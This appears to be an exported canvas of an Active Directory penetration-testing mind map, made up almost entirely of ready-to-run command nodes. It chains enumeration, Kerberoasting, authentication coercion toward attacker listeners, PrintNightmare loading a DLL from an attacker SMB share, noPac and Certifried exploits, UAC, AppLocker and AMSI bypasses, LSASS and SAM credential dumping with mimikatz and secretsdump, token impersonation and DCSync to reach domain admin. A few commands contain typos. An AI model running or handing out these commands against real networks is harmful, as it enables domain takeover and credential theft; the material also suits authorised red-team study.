{"type":"text","text":"```cmd\nsharphound.exe -c all -d <domain>\n```","id":"210d0bc441d0c404","x":4961,"y":-320,"width":592,"height":50},
{"type":"text","text":"```bash\ncrackmapexec smb $ip -u <user> -p '<password>' -M slinky -o NAME=<filename> SERVER=$ip\n```","id":"21335faace676220","x":5051,"y":-811,"width":592,"height":80},
{"type":"text","text":"```bash\ndrop .url file\n```","id":"567e213b829b1bf5","x":5051,"y":-701,"width":592,"height":50},
{"type":"text","text":"```powershell\nImport-Module sharphound.ps1;invoke-bloodhound -collectionmethod all -domain <domain>\n```","id":"d712cddb79f5daad","x":4961,"y":-414,"width":739,"height":50},
{"type":"text","text":"```bash\ncrackmapexec smb $ip -u <user> -p '<password>' --shares\n```","id":"e9fec7d73e17b861","x":5051,"y":-893,"width":592,"height":50},
{"type":"text","text":"```bash\nGetADUsers.py -all -dc-ip <dc_ip> <domain>/<username>\n```","id":"48390cd76de4c8ce","x":5051,"y":-1075,"width":592,"height":50},
{"type":"text","text":"```bash\ncrackmapexec smb $ip -u <user> -p '<password>' --users\n```","id":"eac79059a8896e21","x":5051,"y":-975,"width":592,"height":50},
{"type":"text","text":"```bash\nbloodhound-python -d <domain> -u <user> -p <password> -gc <dc> -c all\n```","id":"693cb542043a3d6b","x":4961,"y":-604,"width":739,"height":50},
{"type":"text","text":"```bash\n./rusthound -d <domain_to_enum> -u '<user>@<domain>' -p '<password>' -o <outfile> -z\n```","id":"c5bec97f4c38feef","x":4961,"y":-509,"width":739,"height":50},
{"type":"text","text":"Enum DNS","id":"e7df2ef334c93663","x":4715,"y":698,"width":250,"height":50},
{"type":"text","text":"Webdav","id":"ea2b13b2cf5784a4","x":4968,"y":1000,"width":125,"height":60},
{"type":"text","text":"```bash \nPetitPotam.py -d <domain> -u <user> -p <password> -l <listener_ip> <target_ip>\n```","id":"04d97327d7c73733","x":4965,"y":1261,"width":680,"height":50},
{"type":"text","text":"Known vulnerabilities","id":"c6386ba4451b6070","x":4920,"y":1407,"width":193,"height":60,"color":"#7c0404"},
{"type":"text","text":"```bash \nrcpdump.py <domain>/<user>:<password>@<domain_server> | grep MS-RPRN\n```","id":"fbc9668d415690e7","x":4965,"y":1189,"width":623,"height":50},
{"type":"text","text":"```powershell\nadPeas\n```","id":"f4b7cb302e08d40c","x":4715,"y":-30,"width":250,"height":60},
{"type":"text","text":"```powershell\npingcastle\n```","id":"d40599ab86a34af9","x":4715,"y":64,"width":250,"height":60},
{"type":"text","text":"```bash \ncoercer.py -u <user> -d <domain> -p <password> -t <target> -l <attacker_ip>\n```","id":"76968ff7c4881314","x":4965,"y":1330,"width":680,"height":50},
{"type":"text","text":"Exploit !","id":"201c47a4c3c1310e","x":4737,"y":1407,"width":109,"height":60},
{"type":"text","text":"Coerce","id":"ad797d42e76044db","x":4715,"y":1110,"width":125,"height":60},
{"type":"text","text":"```bash\ncertipy find -u <user>@<domain> -p <password> -dc-ip <domaincontroller>\n```","id":"17aa8e4de99006a9","x":5028,"y":814,"width":631,"height":50},
{"type":"text","text":"```bash\ndnstool.py -i 'DOMAIN\\user' -p 'password' --record '*' --action query <dc_ip>\n```","id":"9d40032899213895","x":5028,"y":698,"width":698,"height":50},
{"type":"text","text":"Kerberoasting","id":"97e059287fefafc0","x":4711,"y":415,"width":149,"height":60,"color":"#37ff00"},
{"type":"text","text":"Enumerate AD CS","id":"bd373b59a3c9fe7f","x":4715,"y":814,"width":250,"height":50},
{"type":"text","text":"Connect to computer","id":"fc51fd279ea01784","x":4731,"y":1521,"width":250,"height":60},
{"type":"text","text":"Got an authenticated account on the domain\n(Cleartext pass / Kerberos / NTLM)","id":"4a32fa4a12e9ecbd","x":4200,"y":258,"width":296,"height":85,"color":"#37ff00"},
{"type":"text","text":"Exploit SMB share","id":"4e7bebca0269d15f","x":4711,"y":-761,"width":250,"height":60},
{"type":"text","text":"Get kerberoastable users","id":"20bf9bcc287fbad1","x":4923,"y":282,"width":250,"height":50},
{"type":"text","text":"Get hash","id":"a5e1aefe48a38778","x":4923,"y":496,"width":107,"height":50},
{"type":"text","text":"```cmd\nmimikatz.exe \"sekurlsa::dpapi\"\n```","id":"9054bfb1d2dbec7e","x":6967,"y":-3038,"width":436,"height":50},
{"type":"text","text":"```bash\nsecretsdump.py <domain</<user>:<password>@$ip\n```","id":"ef5b4dda43ab96a2","x":6967,"y":-2965,"width":436,"height":50},
{"type":"text","text":"```cmd\nfindstr /si 'password' *.txt *.xml *.docx *.xlsx *.config\n```","id":"62fa8969e987869a","x":6967,"y":-2852,"width":534,"height":50},
{"type":"text","text":"```cmd\n%appdata%\\Local\\Google\\Chrome\\User Data\\Default\n```\n\n//Location","id":"2a7dcf67134e981b","x":6799,"y":-2649,"width":449,"height":109},
{"type":"text","text":"```cmd\nlazagne.exe all\n```","id":"298420a72820fc58","x":6967,"y":-2745,"width":534,"height":50},
{"type":"text","text":"```powershell\nPowerview\n```","id":"349cc5c5e2a09153","x":4715,"y":-124,"width":250,"height":60},
{"type":"text","text":"**1) Get all users**","id":"b82ed74f2a3248f9","x":4715,"y":-1029,"width":250,"height":60,"color":"1"},
{"type":"text","text":"Bloodhound","id":"202fc757906aeeca","x":4711,"y":-459,"width":129,"height":60,"color":"#37ff00"},
{"type":"text","text":"Enumerate SMB share","id":"f0165800d0dd62ab","x":4719,"y":-898,"width":250,"height":60},
{"type":"text","text":"```powershell\nSharpview\n```","id":"f76af5e657d61b16","x":4715,"y":-218,"width":250,"height":60},
{"type":"text","text":"```bash\ncrackmapexec smb $ip -u <user> -p <password> -M impersonate\n```","id":"28c3017681173290","x":6935,"y":-2298,"width":576,"height":60},
{"type":"text","text":"```cmd\nirs.exe exec --pid <pid> --command <command>\n```","id":"5a9eb9aa1dc3dfce","x":7280,"y":-2204,"width":459,"height":60},
{"type":"text","text":"chrome","id":"74b21754ed5db30d","x":6633,"y":-2624,"width":107,"height":60},
{"type":"text","text":"dpapi extract","id":"359ae089bfef4403","x":6633,"y":-3038,"width":213,"height":50},
{"type":"text","text":"Token manipulation","id":"d7ed9114bc84b8b4","x":6633,"y":-2298,"width":195,"height":60},
{"type":"text","text":"```cmd\nirs.exe list\n```","id":"fd387eb1532418de","x":6935,"y":-2204,"width":250,"height":60},
{"type":"text","text":"```cmd\n.\\incognito.exe list_tokens -u\n```","id":"31462b17822dccbf","x":6935,"y":-2482,"width":313,"height":50},
{"type":"text","text":"```metasploit\nuse incognito\n```","id":"2780e19731eef160","x":6935,"y":-2399,"width":190,"height":50},
{"type":"text","text":"Search password files","id":"ccf6823f13ae7eeb","x":6633,"y":-2857,"width":250,"height":60},
{"type":"text","text":"```bash\nDonPAPI.py <domain</<user>:<password>@$ip\n```","id":"92f8ef21c3616dcf","x":6967,"y":-3105,"width":436,"height":50},
{"type":"text","text":"Search stored password","id":"5d7961633b9beb2a","x":6633,"y":-2750,"width":250,"height":60},
{"type":"text","text":"Extract credentials with certificate authentication (ADCS required)","id":"acb385e56a734e15","x":6935,"y":-2114,"width":320,"height":84},
{"type":"text","text":"Extract credentials from LSA","id":"833bd1320d312c3e","x":6633,"y":-3304,"width":213,"height":90},
{"type":"text","text":"Extract credentials from SAM","id":"a84da1fe4186ef38","x":6633,"y":-3827,"width":213,"height":90},
{"type":"text","text":"Extract credentials from LSASS","id":"6f61c42f74075d22","x":6633,"y":-4448,"width":213,"height":90},
{"type":"text","text":"```bash\ncertipy shadow auto -u '<machine>$'@<domain> -k account '<machine$>'\n```","id":"4df42e76c29602fc","x":3899,"y":-4367,"width":338,"height":121},
{"type":"text","text":"cert potatoes","id":"38e1d4d3f4a06c7f","x":2797,"y":-4525,"width":236,"height":50,"color":"#7c0404"},
{"type":"text","text":"```bash\ncertipy req -k -ca <ca> -template Machine -target <dc>\n```","id":"04c8f5102dd30f20","x":3664,"y":-4494,"width":338,"height":60},
{"type":"text","text":"Shadow credentials","id":"efca47e482aad3a7","x":3664,"y":-4331,"width":190,"height":50},
{"type":"text","text":"Certpotato","id":"93600d5100453ad6","x":2797,"y":-4437,"width":236,"height":50,"color":"#7c0404"},
{"type":"text","text":"TGT (Pass the ticket)","id":"c1700908cee604a7","x":3404,"y":-4437,"width":188,"height":50,"color":"#484e7f"},
{"type":"text","text":"```powershell\n./Rubeus tgtdeleg /nowrap\n```","id":"50ed9c1454364ded","x":3091,"y":-4434,"width":274,"height":45},
{"type":"text","text":"WSReset","id":"6e273994cfa4c46e","x":2833,"y":-5128,"width":151,"height":50},
{"type":"text","text":"MSDT","id":"e0c8beac6517db86","x":2833,"y":-5058,"width":151,"height":50},
{"type":"text","text":"eventvwr","id":"8d32426c188309be","x":2833,"y":-4988,"width":151,"height":60},
{"type":"text","text":"```bash\ncertipy auth -pfx <pfxfile>\n```","id":"825f23809396faad","x":4029,"y":-4494,"width":338,"height":60},
{"type":"text","text":"FodHelper","id":"f721b4bc578621e9","x":2833,"y":-5198,"width":151,"height":50},
{"type":"text","text":"```cmd\nmshta.exe my.hta\n```","id":"97fd1ad2dd7449cc","x":2826,"y":-5573,"width":203,"height":61},
{"type":"text","text":"MSBuild","id":"214c90e43bf45ac6","x":2826,"y":-5485,"width":118,"height":50},
{"type":"text","text":"AppLocker (whitelisting) bypass","id":"90f8d5ec0dd78f02","x":2474,"y":-5637,"width":250,"height":60},
{"type":"text","text":"KrbRelayUp","id":"252cf854ed432cca","x":2474,"y":-5329,"width":146,"height":60},
{"type":"text","text":"Service account (IIS/Mssql) \n(got SeImpersonate)","id":"7c84817c8a5933a4","x":2477,"y":-4609,"width":250,"height":60},
{"type":"text","text":"PrintSpoofer","id":"86584cd98e56428e","x":2797,"y":-4604,"width":236,"height":50,"color":"#7c0404"},
{"type":"text","text":"...","id":"e926fb5441790625","x":2513,"y":-4095,"width":71,"height":60},
{"type":"text","text":"RoguePotato","id":"49e3136702deb26c","x":2797,"y":-4749,"width":236,"height":50,"color":"#7c0404"},
{"type":"text","text":"```bash\nticketer.py -nthash <hash> -domain-sid <domain_sid> -domain <domain> -spn cifs/<dc> <targetUser>\n```","id":"26551b6dd6d2654b","x":4759,"y":-4469,"width":338,"height":121},
{"type":"text","text":"Machine NT Hash","id":"8df1831087bbc554","x":4487,"y":-4434,"width":188,"height":50,"color":"#484e7f"},
{"type":"text","text":"Admin access","id":"586fe310432cd4cf","x":4999,"y":-4897,"width":250,"height":60,"color":"#ff00ff"},
{"type":"text","text":"Juicy Potato / Lovely Potato","id":"d4141d1c7cc59bec","x":2797,"y":-4676,"width":236,"height":50,"color":"#7c0404"},
{"type":"text","text":"Reflection method","id":"0fb7e603b50bcb1e","x":2794,"y":-6095,"width":250,"height":60},
{"type":"text","text":"AMSI bypass","id":"781a732b4006a571","x":2475,"y":-6095,"width":250,"height":60},
{"type":"text","text":"Patching amsi.dll","id":"45cf463f4e51484f","x":2798,"y":-6013,"width":250,"height":60},
{"type":"text","text":"```cmd\nfindstr /si password *.xml *.ini *.txt *.config *.docx *.xlsx *.log *.ps1\n```","id":"da6b36e0f524b2d5","x":2776,"y":-5923,"width":584,"height":83},
{"type":"text","text":"SMBGhost CVE-2020-0796","id":"e3f5a90961e660e9","x":2477,"y":-4900,"width":250,"height":55,"color":"#7c0404"},
{"type":"text","text":"CVE-2021-36934 (HiveNightmare/SeriousSAM)","id":"a23a0b600c29a8b1","x":2477,"y":-4823,"width":250,"height":74,"color":"#7c0404"},
{"type":"text","text":"User Account Control (UAC) bypass","id":"60f9b0d9a4fe90ea","x":2477,"y":-5093,"width":250,"height":60},
{"type":"text","text":"```powershell\nGet-Childitem -Path HKLM:\\Software\\Policies\\Microsoft\\Windows\\SrpV2\\Exe (dll/msi/...)\n```","id":"90405f92b146e87a","x":2794,"y":-6387,"width":780,"height":60},
{"type":"text","text":"```powershell\ninstallutil.exe /lofile= /LogToConsole=false /U C:\\runme.exe\n```","id":"bf342f20156dffc9","x":3108,"y":-5822,"width":450,"height":75},
{"type":"text","text":"Low Access","id":"52ba67c5164218f2","x":2059,"y":-5329,"width":250,"height":60,"color":"#969292"},
{"type":"text","text":"```cmd\nwinpeas.exe\n```","id":"c3d50d1fd6e636c8","x":2475,"y":-6261,"width":250,"height":60},
{"type":"text","text":"Get Applocker info","id":"348477c502851715","x":2474,"y":-6387,"width":250,"height":60},
{"type":"text","text":"```powershell\n.\\KrbRelayUp.exe relay -Domain <domain> -CreateNewComputerAccount -ComputerName <Computer$> -ComputerPassword <password>\n```","id":"b87f341277c9384b","x":2690,"y":-5342,"width":592,"height":86},
{"type":"text","text":"Low access \n(without applocker)","id":"826eb4cf6a2dad98","x":3765,"y":-5657,"width":250,"height":60,"color":"#969292"},
{"type":"text","text":"Powershell CLM bypass","id":"3e98f47ee3c00a12","x":2828,"y":-5810,"width":232,"height":50},
{"type":"text","text":"Use `C:\\Windows\\Tasks`","id":"add282f61259abd3","x":2826,"y":-5735,"width":225,"height":50},
{"type":"text","text":"https://amsi.fail/","id":"b3b3841401bd9741","x":2798,"y":-6176,"width":250,"height":60},
{"type":"text","text":"```bash\ncertipy req -u 'certifriedpc$'@<domain> -p 'certifriedpass' -target <ca_fqdn> -ca <ca_name> -template Machine\n```","id":"900021c932dad836","x":3146,"y":-2470,"width":470,"height":118},
{"type":"text","text":"```bash\nCVE-2021-1675.py <domain>/<user>:<password>@<target> '\\\\<smb_server_ip>\\<share>\\inject.dll'\n```","id":"dd6a4e216b3c052d","x":2726,"y":-2591,"width":811,"height":60},
{"type":"text","text":"DCSYNC","id":"d9d5d767b1571989","x":4450,"y":-2440,"width":250,"height":60},
{"type":"text","text":"Delete computer","id":"76d1fa388165d915","x":5060,"y":-2440,"width":250,"height":60},
{"type":"text","text":"Admin","id":"4caa85cf1f4d63e7","x":3601,"y":-2591,"width":250,"height":60,"color":"#ff00ff"},
{"type":"text","text":"DOM ADMIN","id":"55d4155fd991c8ce","x":4749,"y":-2440,"width":250,"height":60,"color":"1"},
{"type":"text","text":"Pass the ticket","id":"45e6a7d47aedd2bc","x":4149,"y":-2441,"width":250,"height":60},
{"type":"text","text":"```bash\ncertipy auth -pfx <pfx_file> -username '<dc>$' -domain <domain> -dc-ip <dc_ip>\n```","id":"f7ade2460b50b60d","x":3661,"y":-2452,"width":427,"height":83},
{"type":"text","text":"```powershell\n.\\KrbRelayUp.exe spawn -m rbcd -d <domain> -dc <dc> -cn <computer_name> -cp <computer_pass>\n```","id":"4cde0818baf9b297","x":3354,"y":-5342,"width":465,"height":86},
{"type":"text","text":"Use `C:\\Windows\\Temp`","id":"2799851098c46683","x":2828,"y":-5647,"width":225,"height":50},
{"type":"text","text":"privexchange \n(CVE-2019-0724, CVE-2019-0686)","id":"2954d0268333c398","x":2362,"y":-3190,"width":302,"height":68,"color":"#7c0404"},
{"type":"text","text":"PrintNightmare\nCVE-2021-1675 / CVE-2021-34527","id":"3df5ec213f4e4d31","x":2362,"y":-2594,"width":302,"height":65,"color":"#7c0404"},
{"type":"text","text":"DCSYNC","id":"4a74566f32187f41","x":3628,"y":-2809,"width":250,"height":60},
{"type":"text","text":"Domain Admin","id":"1b349f6d8a919d39","x":3802,"y":-3141,"width":250,"height":60,"color":"1"},
{"type":"text","text":"DOM ADMIN","id":"8185244e7549886a","x":3927,"y":-2809,"width":250,"height":60},
{"type":"text","text":"Delete computer","id":"21219c31e4b16d27","x":4230,"y":-2809,"width":250,"height":60},
{"type":"text","text":"Pass the ticket","id":"930c56a7e17afe85","x":3327,"y":-2810,"width":250,"height":60},
{"type":"text","text":"```bash\ncrackmapexec smb $ip -u <user> -p <passwor> -M nopac\n```","id":"d2827cc36e06a5e8","x":2788,"y":-3021,"width":485,"height":50},
{"type":"text","text":"```powershell\n.\\noPac.exe -domain <domain< -user <user> -pass <pass> /dc <dc_fqdn> /mAccount <machine_account> /mPassword <machine_pass> /service cifs /ptt\n```","id":"c10ff3135712ac39","x":2788,"y":-2937,"width":387,"height":140},
{"type":"text","text":"With impacket\n```bash\naddcomputer.py / addspn.py / renameMachine.py / getTGT.py / renameMachine.py / getST.py \n```","id":"825683f4e54297d3","x":2788,"y":-2755,"width":387,"height":140},
{"type":"text","text":"```bash\ncertipy account create -u <user>@<domain> -p '<password>'-user 'certifriedpc'-pass 'certifriedpass' -dns '<FQDN_DC>'\n```","id":"af61c9a09d5951a6","x":2664,"y":-2470,"width":440,"height":118},
{"type":"text","text":"Certifried\nCVE-2022-26923 (need ADCS)","id":"b4150b270f77c0dc","x":2362,"y":-2450,"width":262,"height":79,"color":"#7c0404"},
{"type":"text","text":"Admin","id":"3412e1b5cb3186bc","x":3802,"y":-3245,"width":250,"height":60,"color":"#ff00ff"},
{"type":"text","text":"Pass the ticket","id":"6e7f1ca24ed168b2","x":3753,"y":-3385,"width":250,"height":60},
{"type":"text","text":"Admin","id":"b4e3a3c44a6dd80d","x":4362,"y":-3445,"width":250,"height":60,"color":"#ff00ff"},
{"type":"text","text":"Domain Admin","id":"3b202c61edbb1b72","x":4362,"y":-3341,"width":250,"height":60,"color":"1"},
{"type":"text","text":"Result / Go to","id":"a36343bb92eb2b78","x":4095,"y":-3385,"width":164,"height":60},
{"type":"text","text":"```bash\nrpcclient $> lookupnames <name> wmic useraccount get name, sid\n```\n\n```metasploit\nauxiliary/admin/kerberos/ms14_068_kerberos_checksum\n```","id":"507cfc0dda48e9f3","x":3022,"y":-3442,"width":595,"height":131},
{"type":"text","text":"SamAccountName / nopac\nCVE-2021-42284 / CVE-2021-42278","id":"197a860c1e209b1d","x":2362,"y":-2871,"width":302,"height":74,"color":"#7c0404"},
{"type":"text","text":"MS14-068","id":"4bb9007e12d19813","x":2362,"y":-3371,"width":250,"height":60,"color":"#7c0404"},
{"type":"text","text":"```bash\ncrackmapexec smb $ip -u <user> -p <password> -M drop-sc\n```","id":"ddc779ce510c7a42","x":5824,"y":1025,"width":493,"height":60},
{"type":"text","text":"```bash \nprinterbug.py '<domain>/<username>:<password>'@<Printer_ip> <listener_ip>\n```","id":"6814d7426a33197c","x":5645,"y":1178,"width":390,"height":72},
{"type":"text","text":"Coerce HTTP =>","id":"abb1edf4a12e2f1a","x":6149,"y":1085,"width":168,"height":60,"color":"3"},
{"type":"text","text":"Result / Go to","id":"17d66accbb5f116a","x":3535,"y":-3185,"width":164,"height":60},
{"type":"text","text":"Coerce HTTP =>","id":"4a063d872d519421","x":3313,"y":-3185,"width":164,"height":60},
{"type":"text","text":"```bash\npython privexchange.py -ah <attacker_host_or_ip> <exchange_host> -u <user> -d <domain> -p <password>\n```","id":"944a22c82f0397bd","x":2732,"y":-3190,"width":500,"height":68},
{"type":"text","text":"```bash\nFindSMB2UPTime.py $ip\n```","id":"648b0e27f32e3915","x":2690,"y":-3370,"width":250,"height":60},
{"type":"text","text":"```bash\ngoldenPac.py -dc-ip <dc_ip> <domain>/<user>:'<password>'@<target>\n```","id":"bc4c79ccc2a790ec","x":3023,"y":-3285,"width":594,"height":56},
{"type":"text","text":"Known vulnerabilities","id":"ae03adb4db1e63c1","x":2017,"y":-2870,"width":193,"height":60,"color":"#7c0404"},
{"type":"text","text":"```bloodhound\nMATCH (u:User {hasspn:true}), (c:Computer), p=shortestPath((u)-[*1..]->(c)) RETURN p\n```","id":"0b4ab5229b6fb93d","x":5309,"y":363,"width":784,"height":50},
{"type":"text","text":"Coerce SMB ->","id":"9134f59d6f989372","x":6132,"y":1251,"width":164,"height":60,"color":"3"},
{"type":"text","text":"Lateral move","id":"68b3e9c773637867","x":5113,"y":1519,"width":250,"height":60},
{"type":"text","text":"```bash\nGet-DomainUser -SPN -Properties SamAccountName, ServicePrincipalName\n```","id":"fd21c9413f395315","x":5309,"y":207,"width":618,"height":54},
{"type":"text","text":"```bloodhound\nMATCH (u:User {hasspn:true}) RETURN u\n```","id":"67dc786a9714bdfe","x":5309,"y":282,"width":732,"height":50},
{"type":"text","text":"ADCS","id":"6b13c399f404e742","x":5742,"y":809,"width":98,"height":60},
{"type":"text","text":"```bash\ncrackmapexec smb $ip -u <user> -p <password> -M webdav \n```\nFind","id":"81f53cff86f036fb","x":5241,"y":892,"width":605,"height":103},
{"type":"text","text":"Hash found (TGS)","id":"65c6886b82a2677d","x":5846,"y":491,"width":164,"height":60,"color":"2"},
{"type":"text","text":"Start webdav with Documents.searchConnector-ms file","id":"6b6a9a041f583d2d","x":5259,"y":1030,"width":532,"height":50},
{"type":"text","text":"Coerce with <attacker_hostname>@80 /Something as target","id":"29ebee457c0a21be","x":5259,"y":1090,"width":532,"height":50},
{"type":"text","text":"WriteProperty (Self-Membership)","id":"acce265249c2a9a8","x":7154,"y":-496,"width":311,"height":50},
{"type":"text","text":"Shadow Credentials\n(needs ADCS)","id":"2599fc752ab281df","x":7219,"y":-845,"width":180,"height":60},
{"type":"text","text":"WriteOwner on Group","id":"52ae7aee0e188ba3","x":7154,"y":-272,"width":196,"height":50},
{"type":"text","text":"WriteDACL + WriteOwner\nGive yourself Generic all","id":"2eecb0fbe88743b5","x":7385,"y":-293,"width":227,"height":93},
{"type":"text","text":"GenericAll/WriteProperty on Group","id":"15b5dbeccb68f639","x":7154,"y":-560,"width":311,"height":50},
{"type":"text","text":"GenericAll / GenericWrite","id":"ddb7c12133b27fc9","x":7154,"y":-93,"width":231,"height":50},
{"type":"text","text":"User with clear text pass","id":"fd5b5eb74c3794da","x":8223,"y":55,"width":260,"height":50,"color":"#37ff00"},
{"type":"text","text":"Scan network","id":"bd23c2ea8455d054","x":5803,"y":693,"width":250,"height":60,"color":"#f16fbb"},
{"type":"text","text":"```bash\nGetUserSPN.py -request -dc-ip <dc_ip> <domain>/<user>:<password>\n```","id":"1fddd6679e652d47","x":5105,"y":448,"width":618,"height":54},
{"type":"text","text":"```cmd\nRubeus.exe kerberoast\n```","id":"d677c05ca5847f5a","x":5105,"y":546,"width":250,"height":60},
{"type":"text","text":"Access","id":"3ed47201ac136a58","x":7639,"y":1478,"width":107,"height":50,"color":"#969292"},
{"type":"text","text":"```powerview\nGet-DomainOU|Get-DomainObjectAcl -ResolveGUIDs|?{$_.ObjectAceType -eq \"GP-Link\"-and $_.ActiveDirectoryRights -match \"WriteProperty\"}|select ObjectDN, SecurityIdentifier|fl\n```","id":"5a68e0ea14ed4ba4","x":7620,"y":1365,"width":835,"height":83},
{"type":"text","text":"```cmd\nsc \\\\DNSServer start dns\n```","id":"6efc07f8a965fa0a","x":8141,"y":1653,"width":278,"height":60},
{"type":"text","text":"Admin","id":"55d68cba1bac9660","x":8483,"y":1653,"width":98,"height":60,"color":"#ff00ff"},
{"type":"text","text":"ACL","id":"cc7929e3d7815c26","x":8390,"y":-521,"width":186,"height":50,"color":"#001eff"},
{"type":"text","text":"Crack hash","id":"fc10944f68425a74","x":8317,"y":-982,"width":146,"height":50,"color":"2"},
{"type":"text","text":"Lateral move PTC","id":"b55f8176b00b3182","x":8317,"y":-860,"width":250,"height":50,"color":"#484e7f"},
{"type":"text","text":"Coerce SMB ","id":"3c65d74f99afa252","x":5727,"y":-751,"width":167,"height":60,"color":"3"},
{"type":"text","text":"ACL","id":"c10330c70f1cd23f","x":6129,"y":-156,"width":164,"height":50,"color":"#31dbdd"},
{"type":"text","text":"Users","id":"8450ac62513edd50","x":5730,"y":-1025,"width":164,"height":50,"color":"#31dbdd"},
{"type":"text","text":"Self (Self-Membership) on Group","id":"77d1488e0e3f2dfe","x":7154,"y":-626,"width":311,"height":50},
{"type":"text","text":"Get LAPS passwords","id":"e2ad6cd89e56b299","x":6942,"y":879,"width":149,"height":66},
{"type":"text","text":"On user","id":"05c8f7cc8c95075b","x":6942,"y":282,"width":149,"height":50},
{"type":"text","text":"```cmd\nmimikatz.exe lsadump::dcsync /domain:<target_domain> /user:<target_domain>\\administrator\n```","id":"af7841cfbf9781a7","x":7131,"y":-1082,"width":867,"height":50},
{"type":"text","text":"```bash\nsecretsdump.py '<domain>'/'<user>':'<passwor>'@'<domain_controller>'\n```","id":"f5aabc5dfecc71a2","x":7131,"y":-992,"width":867,"height":50},
{"type":"text","text":"```bash\naclpwn.py\n```","id":"947c6f1bb71402ed","x":6942,"y":481,"width":257,"height":59},
{"type":"text","text":"Result / Go to","id":"39bd7e3018e6b6cd","x":5890,"y":-82,"width":151,"height":60},
{"type":"text","text":"Delegation","id":"2d1289f83f35a931","x":6129,"y":-77,"width":164,"height":50,"color":"#31dbdd"},
{"type":"text","text":"Users","id":"bf297551e8a02f7b","x":6129,"y":5,"width":164,"height":50,"color":"#31dbdd"},
{"type":"text","text":"Account","id":"c5904de5225c08ef","x":5730,"y":-893,"width":164,"height":50,"color":"#37ff00"},
{"type":"text","text":"```bash\nsecretsdump.py -system SYSTEM -sam SAMLOCAL\n```","id":"271ef3a8a2ead268","x":7671,"y":-3244,"width":451,"height":50},
{"type":"text","text":"Shadow copies","id":"00f9aed73ad4a16f","x":6987,"y":-3535,"width":173,"height":50},
{"type":"text","text":"```cmd\n.\\incognito.exe execute -c \"<domain>\\<user>\" powershell.exe\n```","id":"86f3669e25250e2f","x":7312,"y":-2482,"width":528,"height":50},
{"type":"text","text":"```metasploit\nimpersonate_token <domain>\\\\<user>\n```","id":"b150d2415099901a","x":7248,"y":-2399,"width":373,"height":50},
{"type":"text","text":"```bash\nsecretsdump.py <domain>/<user>:<password>@$ip\n```\n","id":"ab91478900e8d508","x":6987,"y":-3329,"width":468,"height":50},
{"type":"text","text":"```bash\nreg.py <domain>/<user>:<password>@$ip backup -o '\\\\<smb_ip>\\share'\n```\n","id":"b4ca0c95d6b4a64c","x":6984,"y":-3244,"width":592,"height":50},
{"type":"text","text":"```cmd\nSharpChromium.exe\n```","id":"c6179de1f7e86cb1","x":7280,"y":-2619,"width":221,"height":50},
{"type":"text","text":"```bash\nacltoolkit <domain>/<user>:'<password>'@<target> get-objectacl [-all] -object <object>\n```","id":"0e23b2fde7d80b08","x":6942,"y":578,"width":788,"height":65},
{"type":"text","text":"Can change \nmsDS-KeyCredentialLink\n(Generic Write) + ADCS","id":"9eea463093804a97","x":6942,"y":-860,"width":231,"height":89},
{"type":"text","text":"On Group","id":"9b89e55478b8a09a","x":6942,"y":-541,"width":112,"height":60},
{"type":"text","text":"```bash\ncrackmapexec smb <ip_range> -u <user> -p '<password>' --lsa\n```","id":"2e1ac524b3924b63","x":6987,"y":-3416,"width":569,"height":50},
{"type":"text","text":"```cmd\nmklink /d c:\\shadowcopy\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\\n```\n","id":"5a4d79732a67a80f","x":7620,"y":-3535,"width":636,"height":50},
{"type":"text","text":"Result / Go to","id":"bb8f75c540107161","x":8379,"y":-3346,"width":164,"height":60},
{"type":"text","text":"```cmd\ndiskshadow list shadows all\n```\n","id":"c609e6aecfbef632","x":7218,"y":-3537,"width":280,"height":55},
{"type":"text","text":"```cmd\ncrackmapexec smb <ip_range> -u <user> -p <password> --sam\n```","id":"690869a90c9f57b0","x":6977,"y":-4008,"width":694,"height":50},
{"type":"text","text":"```cmd\nlsassy -d <domain> -u <user> -p <password> $ip\n```","id":"944c929db022e960","x":6977,"y":-4124,"width":475,"height":50},
{"type":"text","text":"```cmd\ncrackmapexec smb <ip_range> -u <user> -p <password> -M lsassy\n```","id":"bbb0d637d551e100","x":6977,"y":-4210,"width":694,"height":50},
{"type":"text","text":"```cmd\nmimikatz.exe \"privilege::debug\" \"lsadump::sam\" \"exit\"\n```\n","id":"84289f513bd2e2db","x":6984,"y":-3690,"width":636,"height":50},
{"type":"text","text":"```metasploit\nhashdump\n```","id":"b5907e8a280c9722","x":6977,"y":-3942,"width":173,"height":60},
{"type":"text","text":"Administrator access","id":"dd0c3984ff99dfcc","x":6206,"y":-3289,"width":250,"height":60,"color":"#ff00ff"},
{"type":"text","text":"```cmd\nPPLdump64.exe <lsass.exe|lsass_pid> lsass.dmp\n```","id":"08336a9e3e74b49e","x":7321,"y":-4709,"width":455,"height":50},
{"type":"text","text":"```cmd\nmimikatz \"privilege::debug\" \"token::elevate\" \"sekurlsa::logonPasswords\" \"exit\"\n```","id":"6d6a0fb94d0b9ffe","x":6977,"y":-4393,"width":475,"height":70},
{"type":"text","text":"LSASS as a Protected Process","id":"ab8b5c7701263757","x":6977,"y":-4643,"width":250,"height":60},
{"type":"text","text":"```metasploit\nload kiwi\n```","id":"44abc2dfd5c5bd7d","x":6977,"y":-4287,"width":170,"height":50},
{"type":"text","text":"```cmd\nprocdump.exe -accepteula -ma lass.exe lsass.dmp\n```","id":"0576da13dd3003a1","x":6977,"y":-4463,"width":475,"height":50},
{"type":"text","text":"```cmd\nreg.exe save hklm\\sam <file>; reg.exe save hklm\\security <file>; reg.exe save hklm\\system <file>\n```\n","id":"d6d4c74515bf4ede","x":6977,"y":-3866,"width":852,"height":50},
{"type":"text","text":"```bash\nreg.py <domain>/<user>:<password>@$ip backup -o '\\\\<smb_ip>\\share'\n```\n","id":"b5d8c3aeca914f84","x":6977,"y":-3782,"width":592,"height":50},
{"type":"text","text":"```metasploit\ncreds_all\n```","id":"5380c90161fa5a28","x":7227,"y":-4287,"width":170,"height":50},
{"type":"text","text":"```bash\nsecretsdump.py <domain>/<user>:<password>@$ip\n```\n","id":"f0d3f432b33385af","x":6984,"y":-3620,"width":468,"height":50},
{"type":"text","text":"Who can read LAPS","id":"e48a2715efdeda5f","x":7205,"y":692,"width":199,"height":60},
{"type":"text","text":"```cmd\nnet user <user> <password> /domain\n```","id":"d0999fab6e5e57b5","x":7769,"y":50,"width":380,"height":60},
{"type":"text","text":"```bash\ntargetedKerberoast.py -d <domain> -u <user> -p <pass>\n```","id":"4532e54c2b563b93","x":7769,"y":140,"width":532,"height":60},
{"type":"text","text":"msDs-AllowedToActOnBehalf","id":"7e898e8fd9ae7305","x":7465,"y":-143,"width":298,"height":50},
